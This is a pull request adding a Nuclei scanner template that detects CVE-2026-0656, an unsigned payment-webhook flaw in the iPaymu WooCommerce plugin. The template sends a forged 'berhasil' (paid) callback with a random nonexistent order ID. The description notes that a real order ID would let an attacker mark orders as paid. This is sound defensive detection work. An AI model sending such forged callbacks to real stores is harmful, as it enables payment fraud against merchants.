### PR TITLE
Add CVE-2026-0656 iPaymu webhook authorization template

### DIFF
--- a/http/cves/2026/CVE-2026-0656.yaml
+++ b/http/cves/2026/CVE-2026-0656.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-0656
+
+info:
+  name: iPaymu Payment Gateway for WooCommerce <= 2.0.2 - Unauthenticated Webhook Handler (CVE-2026-0656)
+  author: str4k3r
+  severity: high
+  description: >
+    The iPaymu Payment Gateway for WooCommerce plugin <= 2.0.2 registers its
+    `check_ipaymu_response()` webhook handler on `?wc-api=Ipaymu_WC_Gateway`
+    without any signature or origin verification. An unauthenticated POST
+    with attacker-controlled `id_order`/`status`/`trx_id` fields is processed
+    all the way to an order lookup (and, for a real order ID, lets an
+    attacker mark WooCommerce orders as paid without payment). 2.0.3 closes
+    this by requiring a `reference_id` field and an HMAC `X-Signature` header
+    validated against the merchant VA key before any order lookup occurs.
+  impact: |
+    An attacker can forge payment callbacks and potentially mark a real
+    WooCommerce order as paid without a corresponding payment.
+  remediation: Upgrade the plugin to 2.0.3 or later.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e639aed-ec67-4212-9051-1f7465bbfde2?source=cve
+    - https://plugins.trac.wordpress.org/browser/ipaymu-for-woocommerce/tags/2.0.2/gateway.php?marks=316-336,370-380#L316
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429657%40ipaymu-for-woocommerce&new=3429657%40ipaymu-for-woocommerce
+  classification:
+    cve-id: CVE-2026-0656
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ipaymu
+    product: ipaymu-for-woocommerce
+    technology: WordPress, WooCommerce, PHP
+  tags: cve,cve2026,wordpress,woocommerce,ipaymu,auth-bypass,unauth
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/?wc-api=Ipaymu_WC_Gateway"
+    headers:
+      Content-Type: application/json
+    body: '{"id_order":{{rand_int(100000000,999999999)}},"status":"berhasil","trx_id":"nuclei-{{randstr}}"}'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 404
+      - type: word
+        part: body
+        words:
+          - "Order not found"

--- a/http/cves/2026/CVE-2026-0656.yaml
+++ b/http/cves/2026/CVE-2026-0656.yaml
@@ -25,6 +25,8 @@ info:
     cve-id: CVE-2026-0656
   metadata:
     verified: true
+    verification_status: VERIFIED
+    artifact_scope: DEPLOYABLE
     max-request: 1
     vendor: ipaymu
     product: ipaymu-for-woocommerce


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-0656, the unauthenticated iPaymu webhook handler in the iPaymu Payment Gateway for WooCommerce plugin through 2.0.2. Version 2.0.3 requires a reference ID and HMAC `X-Signature` before processing the callback.

## Detection

The template sends one callback-shaped JSON request with a runtime-random, high-range nonexistent order ID. Vulnerable 2.0.2 reaches the order lookup and returns the deterministic `Order not found` response; fixed 2.0.3 rejects the unsigned request before lookup. The randomized nonexistent ID avoids touching any real order, payment, or WooCommerce state.

## Validation

- Official WordPress.org plugin 2.0.2: DETECTED 3/3
- Official WordPress.org plugin 2.0.3: NOT_DETECTED 3/3
- Native Nuclei v3.11.0 validation: passed
- No credentials, real order ID, external callback, or state-changing order update used

## References

- https://www.wordfence.com/threat-intel/vulnerabilities/id/7e639aed-ec67-4212-9051-1f7465bbfde2?source=cve
- https://plugins.trac.wordpress.org/browser/ipaymu-for-woocommerce/tags/2.0.2/gateway.php
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429657%40ipaymu-for-woocommerce&new=3429657%40ipaymu-for-woocommerce